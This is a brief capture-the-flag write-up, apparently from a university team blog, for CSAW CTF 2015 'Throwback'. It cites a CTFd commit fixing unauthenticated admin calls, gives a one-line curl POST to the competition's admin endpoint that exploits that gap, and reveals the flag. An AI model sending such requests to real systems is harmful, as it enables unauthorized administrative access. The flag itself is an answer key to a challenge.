OSIRIS Blog
  • Home
  • About
Sign in Subscribe

CSAW CTF 2015 - Throwback

Vaughn Valle

Vaughn Valle

Sep 21, 2015
  1. We can see a recent bugfix to CTFd, preventing unauthed admin calls at https://github.com/CTFd/CTFd/commit/9578355143d7af675fc4776b0f2de802be91e261.

  2. We make a POST request to it with cURL with: curl -da=a https://ctf.isis.poly.edu/admin/chal/new.

  3. We get back the flag: flag{at_least_it_isnt_php}.

  4. Unwrap the flag (remove the flag{} around it), and we get the solution: at_least_it_isnt_php.

Read more

Kraken - TUCTF

Kraken - TUCTF

Unleash the Kraken

By cpan57 Feb 6, 2025
hateful

hateful

This post is a write-up for the pwn.hateful challenge in Nullcon Goa HackIM 2025 CTF. root@72f9eb9e3ebc:/chal/NULLCON/hateful# ./ld-linux-x86-64.so.2 --library-path . ./hateful My Boss is EVIL!!! I hate my Boss!!! These are things you really want to say to your Boss don't you? well

By Xinsheng Zhu Feb 6, 2025
hateful2

hateful2

This post is a write-up for the pwn.hateful2 challenge in Nullcon Goa HackIM 2025 CTF. root@72f9eb9e3ebc:/chal/NULLCON/hateful2# ./ld-linux-x86-64.so.2 --library-path . ./hateful2 _______ _________ _______ _______ _ _______ |\ /|( ___ )\__ __/( ____ \( ____ \|\ /|( \ / ___ ) | ) ( || ( ) | ) ( | ( \/| ( \/| ) ( || ( \/ ) | | (___) || (___) | | | | (__ | (__ | | | || | / ) | ___ || ___ | | |

By Xinsheng Zhu Feb 6, 2025
A lone flag meanders along it's merry way into the clutches of the merciless CTF player

PowerPlay

By Smallfoot Feb 1, 2025

By Vivek Radhakrishnan Feb 2, 2025
OSIRIS Blog
  • Sign up
Powered by Ghost

Join our newsletter!

Subscribe to stay up to date on OSIRIS events and secrets 👀